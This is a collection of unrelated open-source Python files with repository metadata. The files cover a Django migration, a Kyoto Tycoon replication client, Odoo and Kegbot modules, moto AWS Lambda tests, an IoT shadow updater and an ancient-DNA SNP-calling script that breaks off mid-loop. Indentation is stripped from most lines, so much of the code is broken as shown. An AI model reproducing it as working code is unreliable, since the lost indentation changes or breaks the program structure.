is_staff=u in global_staff
)
# Migrate deliveries: put product back together with them
print("Index deliveries")
d = {} # dv.id -> fields
for dv in x['delivery']:
d[dv['pk']] = dict(dv['fields'], products=[])
print(f"Index {len(x['products'])} products within deliveries")
for pd in x['product']:
dv = d[pd['fields']['delivery']]
dv['products'].append(pd)
products = {} # old_pd.id -> new_pd.id
for y in d.values():
old_nwid = y['network']
nw_name = next(z['fields']['name'] for z in x['network'] if z['pk']==old_nwid)
nw = Network.objects.get(name=nw_name)
    dv = Delivery.objects.create(
name=y['name'],
network=nw,
state=y['state']
)
print(f" - {dv.network.name} / {dv.name}")
for p in y['products']:
kwargs = dict(p['fields'], delivery=dv)
pd = Product.objects.create(**kwargs)
products[p['pk']] = pd.id
# State REGULATING has been suppressed, so now TERMINATED is E instead of F
Delivery.objects.filter(state='F').update(state='E')
# Migrate purchases
if True:
print("Import purchases...")
for y in x['purchase']:
f = y['fields']
Purchase.objects.create(
user=users[f['user'][0]],
product_id=products[f['product']],
quantity=f['quantity']
)
|
fab13n/caracole
|
floreal/migrate-floreal.py
|
Python
|
mit
| 4,586
|
# -*- coding: utf-8 -*-
#
# Copyright 2014, Carlos Rodrigues
#
# Redistribution and use of this source code is licensed under
# the BSD license. See COPYING file for license description.
#
import socket
import struct
import time
from .kt_error import KyotoTycoonException
MB_REPL = 0xb1
MB_SYNC = 0xb0
OP_SET = 0xa1
OP_REMOVE = 0xa2
OP_CLEAR = 0xa5
def _read_varnum(data):
value = 0
for i, byte in enumerate(data):
value = (value << 7) + (byte & 0x7f)
if byte < 0x80:
return (value, data[i+1:])
return (0, data)
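# Example: _read_varnum(bytearray(b'\x81\x00key')) returns (128, bytearray(b'key')):
# 0x81 0x00 is base-128 with continuation bits, i.e. (1 << 7) + 0 = 128.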
def _decode_log_entry(entry_data):
sid, db, db_op = struct.unpack('!HHB', entry_data[:5])
entry = {'sid': sid, 'db': db, 'op': db_op}
if db_op == OP_CLEAR:
return entry
key_size, buf = _read_varnum(bytearray(entry_data[5:]))
if db_op == OP_REMOVE:
entry['key'] = bytes(buf[:key_size])
return entry
if db_op == OP_SET:
value_size, buf = _read_varnum(buf)
entry['key'] = bytes(buf[:key_size])
entry['expires'], = struct.unpack('!Q', b'\x00\x00\x00' + bytes(buf[key_size:key_size+5]))
entry['value'] = bytes(buf[key_size+5:key_size+value_size])
return entry
raise KyotoTycoonException('unsupported database operation [%s]' % hex(db_op))
class KyotoSlave(object):
def __init__(self, sid, host='127.0.0.1', port=1978, timeout=30):
'''Initialize a Kyoto Tycoon replication slave with ID "sid" to the specified master.'''
if not (0 <= sid <= 65535):
raise ValueError('SID must fit in a 16-bit unsigned integer')
self.sid = sid
self.host = host
self.port = port
self.timeout = timeout
def consume(self, timestamp=None):
'''Yield all available transaction log entries starting at "timestamp".'''
self.socket = socket.create_connection((self.host, self.port), self.timeout)
start_ts = int(time.time() if timestamp is None else timestamp) * 10**9
# Ask the server for all available transaction log entries since "start_ts"...
self._write(struct.pack('!BIQH', MB_REPL, 0x00, start_ts, self.sid))
magic, = struct.unpack('B', self._read(1))
if magic != MB_REPL:
raise KyotoTycoonException('bad response [%s]' % hex(magic))
while True:
magic, ts = struct.unpack('!BQ', self._read(9))
if magic == MB_SYNC: # ...the head of the transaction log has been reached.
self._write(struct.pack('B', MB_REPL))
continue
if magic != MB_REPL:
raise KyotoTycoonException('bad response [%s]' % hex(magic))
log_size, = struct.unpack('!I', self._read(4))
entry = _decode_log_entry(self._read(log_size))
if entry['sid'] == self.sid: # ...this must never happen!
                raise KyotoTycoonException('bad log entry [sid=%d]' % entry['sid'])
yield entry
def close(self):
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
return True
def _write(self, data):
self.socket.sendall(data)
def _read(self, bytecnt):
buf = []
read = 0
while read < bytecnt:
recv = self.socket.recv(bytecnt - read)
if not recv:
raise IOError('no data while reading')
buf.append(recv)
read += len(recv)
return b''.join(buf)
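# A minimal usage sketch (assumes a Kyoto Tycoon master reachable at the
# default host/port; the slave SID only needs to differ from the master's):
#
#     slave = KyotoSlave(sid=1234)
#     for entry in slave.consume():
#         if entry['op'] == OP_SET:
#             print('set %r -> %r' % (entry['key'], entry['value']))
#         elif entry['op'] == OP_REMOVE:
#             print('remove %r' % entry['key'])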
# EOF - kyotoslave.py
|
sapo/python-kyototycoon
|
kyototycoon/kyotoslave.py
|
Python
|
bsd-3-clause
| 3,487
|
# Copyright 2011 Akretion Sébastien BEAU <sebastien.beau@akretion.com>
# Copyright 2013 Camptocamp SA (author: Guewen Baconnier)
# Copyright 2016 Sodexis
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models
class StockMove(models.Model):
_inherit = "stock.move"
def _get_new_picking_values(self):
values = super()._get_new_picking_values()
sale = self.group_id.sale_id
if sale:
values["workflow_process_id"] = sale.workflow_process_id.id
return values
|
OCA/sale-workflow
|
sale_automatic_workflow/models/stock_move.py
|
Python
|
agpl-3.0
| 544
|
from django.test import TransactionTestCase
from django.test.utils import override_settings
from addict import Dict
from . import models
from .testutils import make_datetime
import copy
from pykeg.backend import get_kegbot_backend
@override_settings(KEGBOT_BACKEND="pykeg.core.testutils.TestBackend")
class StatsTestCase(TransactionTestCase):
reset_sequences = True
def setUp(self):
self.backend = get_kegbot_backend()
models.User.objects.create_user("guest")
test_usernames = ("user1", "user2", "user3")
self.users = [
self.backend.create_new_user(name, "%s@example.com" % name) for name in test_usernames
]
self.taps = [
self.backend.create_tap("tap1", "kegboard.flow0", ticks_per_ml=2.2),
self.backend.create_tap("tap2", "kegboard.flow1", ticks_per_ml=2.2),
]
self.keg = self.backend.start_keg(
"kegboard.flow0",
beverage_name="Unknown",
beverage_type="beer",
producer_name="Unknown",
style_name="Unknown",
)
def testStuff(self):
site = models.KegbotSite.get()
stats = site.get_stats()
self.assertEqual(stats, {})
now = make_datetime(2012, 1, 2, 12, 00)
self.maxDiff = None
d = self.backend.record_drink(
"kegboard.flow0", ticks=1, volume_ml=100, username="user1", pour_time=now
)
expected = Dict(
{
"volume_by_year": {"2012": 100.0},
"total_pours": 1,
"has_guest_pour": False,
"greatest_volume_ml": 100.0,
"registered_drinkers": ["user1"],
"volume_by_day_of_week": {"1": 100.0},
"greatest_volume_id": d.id,
"volume_by_drinker": {"user1": 100.0},
"volume_by_session": {"1": 100.0},
"last_drink_id": d.id,
"keg_ids": [d.keg.id],
"sessions_count": 1,
"average_volume_ml": 100.0,
"total_volume_ml": 100.0,
"largest_session": {"session_id": 1, "volume_ml": 100},
}
)
stats = site.get_stats()
self.assertDictEqual(expected, stats)
now = make_datetime(2012, 1, 3, 12, 00)
d = self.backend.record_drink(
"kegboard.flow0", ticks=200, volume_ml=200, username="user2", pour_time=now
)
stats = site.get_stats()
expected.total_pours = 2
expected.greatest_volume_ml = 200.0
expected.greatest_volume_id = d.id
expected.registered_drinkers.append("user2")
expected.volume_by_drinker["user2"] = 200.0
expected.last_drink_id = d.id
expected.average_volume_ml = 150.0
expected.total_volume_ml = 300.0
expected.volume_by_day_of_week["2"] = 200.0
expected.volume_by_year["2012"] = 300.0
expected.sessions_count = 2
expected.volume_by_session = {"1": 100.0, "2": 200.0}
expected.largest_session = {"session_id": 2, "volume_ml": 200.0}
self.assertDictEqual(expected, stats)
d = self.backend.record_drink(
"kegboard.flow0", ticks=300, volume_ml=300, username="user2", pour_time=now
)
stats = site.get_stats()
expected.total_pours = 3
expected.greatest_volume_ml = 300.0
expected.greatest_volume_id = d.id
expected.volume_by_drinker["user2"] = 500.0
expected.last_drink_id = d.id
expected.average_volume_ml = 200.0
expected.total_volume_ml = 600.0
expected.volume_by_day_of_week["2"] = 500.0
expected.volume_by_year["2012"] = 600.0
expected.sessions_count = 2
expected.volume_by_session = {"1": 100.0, "2": 500.0}
expected.largest_session = {"session_id": 2, "volume_ml": 500.0}
self.assertDictEqual(expected, stats)
previous_stats = copy.copy(stats)
d = self.backend.record_drink("kegboard.flow0", ticks=300, volume_ml=300, pour_time=now)
stats = site.get_stats()
self.assertTrue(stats.has_guest_pour)
self.backend.cancel_drink(d)
stats = site.get_stats()
self.assertDictEqual(previous_stats, stats)
def test_cancel_and_reassign(self):
drink_data = [
(100, self.users[0]),
(200, self.users[1]),
(200, self.users[2]),
(500, self.users[0]),
]
drinks = []
now = make_datetime(2012, 1, 2, 12, 00)
for volume_ml, user in drink_data:
d = self.backend.record_drink(
"kegboard.flow0",
ticks=volume_ml,
username=user.username,
volume_ml=volume_ml,
pour_time=now,
)
drinks.append(d)
self.assertEqual(600, self.users[0].get_stats().total_volume_ml)
self.assertEqual(200, self.users[1].get_stats().total_volume_ml)
self.assertEqual(200, self.users[2].get_stats().total_volume_ml)
self.assertEqual(1000, models.KegbotSite.get().get_stats().total_volume_ml)
self.backend.cancel_drink(drinks[0])
self.assertEqual(500, self.users[0].get_stats().total_volume_ml)
self.assertEqual(200, self.users[1].get_stats().total_volume_ml)
self.assertEqual(200, self.users[2].get_stats().total_volume_ml)
self.assertEqual(900, models.KegbotSite.get().get_stats().total_volume_ml)
self.backend.assign_drink(drinks[1], self.users[0])
self.assertEqual(700, self.users[0].get_stats().total_volume_ml)
self.assertEqual({}, self.users[1].get_stats())
self.assertEqual(200, self.users[2].get_stats().total_volume_ml)
self.assertEqual(900, models.KegbotSite.get().get_stats().total_volume_ml)
self.assertEqual(900, drinks[1].session.get_stats().total_volume_ml)
# Start a new session.
now = make_datetime(2013, 1, 2, 12, 00)
for volume_ml, user in drink_data:
d = self.backend.record_drink(
"kegboard.flow0",
ticks=volume_ml,
username=user.username,
volume_ml=volume_ml,
pour_time=now,
)
drinks.append(d)
self.assertEqual(1300, self.users[0].get_stats().total_volume_ml)
self.assertEqual(200, self.users[1].get_stats().total_volume_ml)
self.assertEqual(400, self.users[2].get_stats().total_volume_ml)
self.assertEqual(1900, models.KegbotSite.get().get_stats().total_volume_ml)
self.assertEqual(1000, drinks[-1].session.get_stats().total_volume_ml)
# Delete all stats for some intermediate drinks.
models.Stats.objects.filter(drink=drinks[-1]).delete()
models.Stats.objects.filter(drink=drinks[-2]).delete()
d = self.backend.record_drink(
"kegboard.flow0", ticks=1111, username=user.username, volume_ml=1111, pour_time=now
)
drinks.append(d)
# Intermediate stats are generated.
self.assertEqual(3011, models.KegbotSite.get().get_stats().total_volume_ml)
self.assertEqual(2111, drinks[-1].session.get_stats().total_volume_ml)
def test_timezone_awareness(self):
site = models.KegbotSite.get()
site.timezone = "US/Pacific"
site.save()
drink_data = [
(100, self.users[0]),
(200, self.users[1]),
(200, self.users[2]),
(500, self.users[0]),
]
drinks = []
# 1 AM UTC
now = make_datetime(2012, 1, 2, 1, 0)
for volume_ml, user in drink_data:
d = self.backend.record_drink(
"kegboard.flow0",
ticks=volume_ml,
username=user.username,
volume_ml=volume_ml,
pour_time=now,
)
drinks.append(d)
self.assertEqual("US/Pacific", d.session.timezone)
stats = site.get_stats()
# Assert that stats are recorded for Sunday (day = 0) rather than
        # UTC's Monday (day = 1).
self.assertEqual({"0": 1000.0}, stats.volume_by_day_of_week)
self.assertEqual(600, self.users[0].get_stats().total_volume_ml)
|
Kegbot/kegbot-server
|
pykeg/core/stats_test.py
|
Python
|
gpl-2.0
| 8,332
|
# coding=utf-8
import boto3
from pxl.sports_apis import form_mlb_string, form_nhl_string, form_nfl_string
from pxl.weather_api import form_weather_string
from pxl.headline_api import form_headline_string
# https://aqy9q7jfavde2.iot.us-west-2.amazonaws.com/things/PXL-CF2016/shadow
def generate_display(params):
"""Takes the params dictionary and returns the appropriate response for iot."""
message_string = ''
mlb_string = form_mlb_string()
nhl_string = form_nhl_string()
nfl_string = form_nfl_string()
weather_string = form_weather_string()
headline_string = form_headline_string()
data_dict = {'mlb': mlb_string, 'nhl': nhl_string, 'nfl': nfl_string, 'weather': weather_string, 'headlines': headline_string}
for key in params:
if params[key] == 'true':
message_string += data_dict[key]
boto_response(message_string)
return message_string
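# e.g. generate_display({'mlb': 'true', 'weather': 'true'}) concatenates the
# MLB and weather strings and pushes the result to the device shadow.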
def boto_response(message):
"""Send a new message to the IOT device."""
part_1 = '{ "state": { "desired": { "message_1": "'
part_3 = '" } } }'
final_message = ''.join([part_1, message, part_3])
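    # the resulting shadow document has the shape:
    #   { "state": { "desired": { "message_1": "<message>" } } }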
final_message = final_message.encode('utf-8')
client = boto3.client('iot-data', region_name='us-west-2')
response = client.update_thing_shadow(
thingName='PXL-CF2016',
payload=final_message
)
|
PXL-CF2016/pxl-master-server
|
pxl/board_iot.py
|
Python
|
mit
| 1,345
|
import base64
import botocore.client
import boto3
import io
import json
import pytest
import sure # noqa # pylint: disable=unused-import
import zipfile
from moto import (
mock_lambda,
mock_ec2,
settings,
)
from uuid import uuid4
from unittest import SkipTest
from .utilities import (
get_role_name,
get_test_zip_file_error,
get_test_zip_file1,
get_zip_with_multiple_files,
get_test_zip_file2,
get_lambda_using_environment_port,
get_lambda_using_network_mode,
get_test_zip_largeresponse,
)
_lambda_region = "us-west-2"
boto3.setup_default_session(region_name=_lambda_region)
@pytest.mark.network
@mock_lambda
def test_invoke_function_that_throws_error():
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python2.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_file_error()},
)
failure_response = conn.invoke(
FunctionName=function_name, Payload=json.dumps({}), LogType="Tail"
)
failure_response.should.have.key("FunctionError").being.equal("Handled")
payload = failure_response["Payload"].read().decode("utf-8")
payload = json.loads(payload)
payload["errorType"].should.equal("Exception")
payload["errorMessage"].should.equal("I failed!")
payload.should.have.key("stackTrace")
logs = base64.b64decode(failure_response["LogResult"]).decode("utf-8")
logs.should.contain("START RequestId:")
logs.should.contain("I failed!: Exception")
logs.should.contain("Traceback (most recent call last):")
logs.should.contain("END RequestId:")
@pytest.mark.network
@pytest.mark.parametrize("invocation_type", [None, "RequestResponse"])
@pytest.mark.parametrize("key", ["FunctionName", "FunctionArn"])
@mock_lambda
def test_invoke_requestresponse_function(invocation_type, key):
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
fxn = conn.create_function(
FunctionName=function_name,
Runtime="python2.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_file1()},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
name_or_arn = fxn[key]
# Only add invocation-type keyword-argument when provided, otherwise the request
# fails to be validated
kw = {}
if invocation_type:
kw["InvocationType"] = invocation_type
in_data = {"msg": "So long and thanks for all the fish"}
success_result = conn.invoke(
FunctionName=name_or_arn, Payload=json.dumps(in_data), LogType="Tail", **kw
)
if "FunctionError" in success_result:
assert False, success_result["Payload"].read().decode("utf-8")
success_result["StatusCode"].should.equal(200)
success_result["ResponseMetadata"]["HTTPHeaders"]["content-type"].should.equal(
"application/json"
)
logs = base64.b64decode(success_result["LogResult"]).decode("utf-8")
logs.should.contain("START RequestId:")
logs.should.contain("custom log event")
logs.should.contain("END RequestId:")
payload = success_result["Payload"].read().decode("utf-8")
json.loads(payload).should.equal(in_data)
# Logs should not be returned by default, only when the LogType-param is supplied
success_result = conn.invoke(
FunctionName=name_or_arn, Payload=json.dumps(in_data), **kw
)
success_result["StatusCode"].should.equal(200)
success_result["ResponseMetadata"]["HTTPHeaders"]["content-type"].should.equal(
"application/json"
)
assert "LogResult" not in success_result
@pytest.mark.network
@mock_lambda
def test_invoke_event_function():
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python2.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_file1()},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
conn.invoke.when.called_with(
FunctionName="notAFunction", InvocationType="Event", Payload="{}"
).should.throw(botocore.client.ClientError)
in_data = {"msg": "So long and thanks for all the fish"}
success_result = conn.invoke(
FunctionName=function_name, InvocationType="Event", Payload=json.dumps(in_data)
)
success_result["StatusCode"].should.equal(202)
json.loads(success_result["Payload"].read().decode("utf-8")).should.equal(in_data)
@pytest.mark.network
@mock_lambda
def test_invoke_lambda_using_environment_port():
if not settings.TEST_SERVER_MODE:
raise SkipTest("Can only test environment variables in server mode")
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python3.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_lambda_using_environment_port()},
)
success_result = conn.invoke(
FunctionName=function_name, InvocationType="Event", Payload="{}"
)
success_result["StatusCode"].should.equal(202)
response = success_result["Payload"].read()
response = json.loads(response.decode("utf-8"))
functions = response["functions"]
function_names = [f["FunctionName"] for f in functions]
function_names.should.contain(function_name)
# Host matches the full URL, so one of:
# http://host.docker.internal:5000
# http://172.0.2.1:5000
# http://172.0.1.1:4555
response["host"].should.match("http://.+:[0-9]{4}")
@pytest.mark.network
@mock_lambda
def test_invoke_lambda_using_networkmode():
"""
Special use case - verify that Lambda can send a request to 'http://localhost'
This is only possible when the `network_mode` is set to host in the Docker args
Test is only run in our CI (for now)
"""
if not settings.moto_network_mode():
raise SkipTest("Can only test this when NETWORK_MODE is specified")
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python3.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_lambda_using_network_mode()},
)
success_result = conn.invoke(
FunctionName=function_name, InvocationType="Event", Payload="{}"
)
response = success_result["Payload"].read()
functions = json.loads(response.decode("utf-8"))["response"]
function_names = [f["FunctionName"] for f in functions]
function_names.should.contain(function_name)
@pytest.mark.network
@mock_lambda
def test_invoke_function_with_multiple_files_in_zip():
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python3.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_zip_with_multiple_files()},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
in_data = {"msg": "So long and thanks for: "}
success_result = conn.invoke(
FunctionName=function_name, InvocationType="Event", Payload=json.dumps(in_data)
)
json.loads(success_result["Payload"].read().decode("utf-8")).should.equal(
{"msg": "So long and thanks for: stuff"}
)
@pytest.mark.network
@mock_lambda
def test_invoke_dryrun_function():
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python2.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_file1(),},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
conn.invoke.when.called_with(
FunctionName="notAFunction", InvocationType="Event", Payload="{}"
).should.throw(botocore.client.ClientError)
in_data = {"msg": "So long and thanks for all the fish"}
success_result = conn.invoke(
FunctionName=function_name,
InvocationType="DryRun",
Payload=json.dumps(in_data),
)
success_result["StatusCode"].should.equal(204)
if settings.TEST_SERVER_MODE:
@mock_ec2
@mock_lambda
def test_invoke_function_get_ec2_volume():
conn = boto3.resource("ec2", _lambda_region)
vol = conn.create_volume(Size=99, AvailabilityZone=_lambda_region)
vol = conn.Volume(vol.id)
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python3.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_file2()},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
in_data = {"volume_id": vol.id}
result = conn.invoke(
FunctionName=function_name,
InvocationType="RequestResponse",
Payload=json.dumps(in_data),
)
result["StatusCode"].should.equal(200)
actual_payload = json.loads(result["Payload"].read().decode("utf-8"))
expected_payload = {"id": vol.id, "state": vol.state, "size": vol.size}
actual_payload.should.equal(expected_payload)
@pytest.mark.network
@mock_lambda
def test_invoke_lambda_error():
lambda_fx = """
def lambda_handler(event, context):
raise Exception('failsauce')
"""
zip_output = io.BytesIO()
zip_file = zipfile.ZipFile(zip_output, "w", zipfile.ZIP_DEFLATED)
zip_file.writestr("lambda_function.py", lambda_fx)
zip_file.close()
zip_output.seek(0)
client = boto3.client("lambda", region_name="us-east-1")
client.create_function(
FunctionName="test-lambda-fx",
Runtime="python2.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
Code={"ZipFile": zip_output.read()},
)
result = client.invoke(
FunctionName="test-lambda-fx", InvocationType="RequestResponse", LogType="Tail"
)
assert "FunctionError" in result
assert result["FunctionError"] == "Handled"
@pytest.mark.network
@pytest.mark.parametrize("key", ["FunctionName", "FunctionArn"])
@mock_lambda
def test_invoke_async_function(key):
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
fxn = conn.create_function(
FunctionName=function_name,
Runtime="python2.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_file1()},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
name_or_arn = fxn[key]
success_result = conn.invoke_async(
FunctionName=name_or_arn, InvokeArgs=json.dumps({"test": "event"})
)
success_result["Status"].should.equal(202)
@pytest.mark.network
@mock_lambda
def test_invoke_function_large_response():
# AWS Lambda should only return bodies smaller than 6 MB
conn = boto3.client("lambda", _lambda_region)
fxn = conn.create_function(
FunctionName=str(uuid4())[0:6],
Runtime="python3.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_largeresponse()},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
resp = conn.invoke(FunctionName=fxn["FunctionArn"])
resp.should.have.key("FunctionError").equals("Unhandled")
payload = resp["Payload"].read().decode("utf-8")
payload = json.loads(payload)
payload.should.equal(
{
"errorMessage": "Response payload size exceeded maximum allowed payload size (6291556 bytes).",
"errorType": "Function.ResponseSizeTooLarge",
}
)
# Absolutely fine when invoking async
resp = conn.invoke(FunctionName=fxn["FunctionArn"], InvocationType="Event")
resp.shouldnt.have.key("FunctionError")
|
spulec/moto
|
tests/test_awslambda/test_lambda_invoke.py
|
Python
|
apache-2.0
| 12,840
|
for x in range(1, 10):
print x
|
caot/intellij-community
|
python/testData/console/indent1.after.py
|
Python
|
apache-2.0
| 33
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('naf_autoticket', '0037_auto_20161230_0136'),
]
operations = [
migrations.RenameField(
model_name='incidentqueue',
old_name='createdIcident',
new_name='createdIncident',
),
]
|
kevinnguyeneng/django-uwsgi-nginx
|
app/naf_autoticket/migrations/0038_auto_20161230_0136.py
|
Python
|
gpl-3.0
| 418
|
#!/usr/bin/env python
from __future__ import division
from optparse import OptionParser
from optparse import OptionGroup
from multiprocessing.dummy import Pool as ThreadPool
import numpy as np
import sys
import math
import os
import re
usage = "usage: python %prog <SAM formatted data with MD field present from stdin> [options] "
parser = OptionParser(usage=usage, version="%prog v1.0")
group = OptionGroup(parser,"pileup options","parameter setting for pileup reads")
group.add_option("--pileup", action="store_true", dest="pileup",help="pileup reads from sam file",default=False)
parser.add_option_group(group)
group = OptionGroup(parser,"extract damage information options","parameter setting for extracting damage information")
group.add_option("--extract", action="store_true", dest="extract",help="extract damage information from sam/bam file",default=False)
group.add_option("-l", "--length", action="store", type="int", dest="length",help="the length of the longest reads", default=300)
parser.add_option_group(group)
group = OptionGroup(parser,"snp calling options","parameter setting for snp calling")
group.add_option("--snpcalling", action="store_true", dest="snpcalling",help="call snp after pileup and damageinfo",default=False)
group.add_option("-f", "--pileupfile", action="store", type="string", dest="pileupfile",help="input pileup file for snp calling")
group.add_option("-d", "--damageinfo", action="store", type="string", dest="damageinfo",help="input the file that stores the damage information")
group.add_option("-p", "--ploidy", action="store", type="int", dest="ploidy",help="ploidy of the genome",default=2)
group.add_option("-a", "--allsite", action="store_true", dest="allsite",help="output snp of all site",default=False)
group.add_option("-q", "--quality", action="store", type="float", dest="quality",help="threshold of variant quality",default=20.0)
parser.add_option_group(group)
parser.add_option("-o", "--outputprefix", action="store", type="string", dest="outputprefix",help="the prefix of output file")
parser.add_option("-t", "--thread", action="store", type="int", dest="thread",help="the number of thread (not for extracting damage information )", default=5)
(options, args) = parser.parse_args()
wdpath = os.getcwd()
# pileup mode
if options.pileup:
headname = wdpath + '/' + options.outputprefix + '.header'
fhead = open(headname, 'w')
chr_list = []
fsplit = []
# split the sam/bam file
for line in sys.stdin:
if line[0] == '@':
fhead.write(line)
continue
col = line.split('\t')
chromosome = col[2]
if chromosome == '*':
continue
if not chr_list:
chr_list.append(chromosome)
splitname = wdpath + '/' + options.outputprefix + '.temporary.1'
fsplit = open(splitname, 'w')
fsplit.write(line)
continue
if chromosome != chr_list[-1]:
fsplit.close()
chr_list.append(chromosome)
splitname = wdpath + '/' + options.outputprefix + '.temporary.' + str(len(chr_list))
fsplit = open(splitname, 'w')
fsplit.write(line)
else:
fsplit.write(line)
fhead.close()
fsplit.close()
temp_list = range(1,len(chr_list)+1)
temp_list.reverse()
    # end of splitting the sam/bam file
def split(para):
os.system('cat ' + options.outputprefix + '.temporary.' + str(para) + ' | python AntCaller_pileup.py > ' + options.outputprefix + '.pileup.' + str(para))
pool = ThreadPool(options.thread)
pool.map(split, temp_list)
pool.close()
pool.join()
temp_list.reverse()
# combine files
fpilename = wdpath + '/' + options.outputprefix + '.AntCaller.pileup'
fpile = open(fpilename, 'w')
# add header
fhead = open(headname, 'r')
for line in fhead:
if line:
fpile.write(line)
fhead.close()
colname = '@chr' + '\t' + 'position' + '\t' + 'ref' + '\t' + 'num' + '\t' + 'base' + '\t' + 'quality' + '\t' + '3-end' +'\t' + '5-end' + '\t' + 'MQ' + '\n'
fpile.write(colname)
for i in temp_list:
fopenname = wdpath + '/' + options.outputprefix + '.pileup.' + str(i)
fopen = open(fopenname, 'r')
for line in fopen:
if line:
fpile.write(line)
fopen.close()
delete_com = options.outputprefix + '.temporary.' + str(i)
delete_pile = options.outputprefix + '.pileup.' + str(i)
if os.path.exists(delete_com):
os.remove(delete_com)
if os.path.exists(delete_pile):
os.remove(delete_pile)
fpile.close()
# delete header
headname2 = options.outputprefix + '.header'
if os.path.exists(headname2):
os.remove(headname2)
# damage information extraction mode
if options.extract:
    # regex for parsing CIGAR operations
cigar_mode = re.compile("([0-9]*)([A-Z])")
def damageinfo(inread, inmd):
read_ref = ''
readlen = len(inread)
pos_five = 0
c2t = 0
g2a = 0
subinfo = ''
mdlist = re.findall('(\d+|\D+)', inmd)
for e in mdlist:
if e.isdigit():
read_ref += inread[pos_five:pos_five + int(e)]
pos_five += int(e)
            elif '^' in e:
continue
elif e.isalpha():
read_ref += e
ncount_other_five[pos_five] += 1
ncount_other_three[readlen - pos_five - 1] += 1
if e == 'C' and inread[pos_five] == 'T':
c2t += 1
ncount_c2t_five[pos_five] += 1
ncount_c2t_three[readlen - pos_five - 1] += 1
pos_five += 1
pos_three = readlen - pos_five + 1
subinfo = subinfo + '|' + str(pos_five) + 'T' + str(pos_three)
elif e == 'G' and inread[pos_five] == 'A':
g2a += 1
ncount_g2a_five[pos_five] += 1
ncount_g2a_three[readlen - pos_five - 1] += 1
pos_five += 1
pos_three = readlen - pos_five + 1
subinfo = subinfo + '|' + str(pos_five) + 'A' + str(pos_three)
else:
pos_five += 1
read_reflen = len(read_ref)
for i in range(read_reflen):
n_count[i] += 1
if read_ref[i] == 'C':
ncount_c_five[i] += 1
ncount_c_three[read_reflen - i - 1] += 1
elif read_ref[i] == 'G':
ncount_g_five[i] += 1
ncount_g_three[read_reflen - i - 1] += 1
subinfo = repr(c2t) + 'T' + repr(g2a) + 'A' + subinfo
return subinfo
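    # e.g. a single C->T at 0-based offset 4 of a 24 bp read returns "1T0A|5T20"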
f2name = wdpath + '/' + options.outputprefix + '.damageinfo'
f2 = open(f2name, 'w')
    # per-position substitution counts from the 5' and 3' ends
n_count = [0] * options.length
ncount_c2t_five = [0] * options.length
ncount_g2a_five = [0] * options.length
ncount_c2t_three = [0] * options.length
ncount_g2a_three = [0] * options.length
ncount_c_five = [0] * options.length
ncount_c_three = [0] * options.length
ncount_g_five = [0] * options.length
ncount_g_three = [0] * options.length
ncount_other_five = [0] * options.length
ncount_other_three = [0] * options.length
# read each line and process
for line in sys.stdin:
if '@' in line[0]:
continue
col = line.split('\t')
read = col[9]
read_325 = read[::-1]
cigar = col[5]
try:
MD = line.split('MD:Z:')[1].split()[0].rstrip('\n')
except IndexError:
print ("This file has sequence without MD filed")
continue
        # if insertions (I) or soft clips (S) are present, rebuild the read without them
        # before extracting damage information; otherwise use the read directly
if 'I' in cigar or 'S' in cigar:
newread = ''
cigarcount = 0
cigarcomponents = cigar_mode.findall(cigar)
for p in cigarcomponents:
if 'I' in p[1]:
cigarcount += int(p[0])
elif 'S' in p[1]:
cigarcount += int(p[0])
else:
cigarcount2 = cigarcount + int(p[0])
newread += read[cigarcount:cigarcount2]
cigarcount = cigarcount2
damagetag = damageinfo(newread, MD)
else:
damagetag = damageinfo(read, MD)
f2.write("total_count" + '\t' + "c_5end" + '\t' + "g_5end" + '\t' + "other_5end" + '\t' + "c2t_5end" + '\t' + "g2a_5end" + '\t' +
"c_3end" + '\t' + "g_3end" + '\t' + "other_3end" + '\t' + "c2t_3end" + '\t' + "g2a_3end" + '\n')
for j in range(len(n_count)):
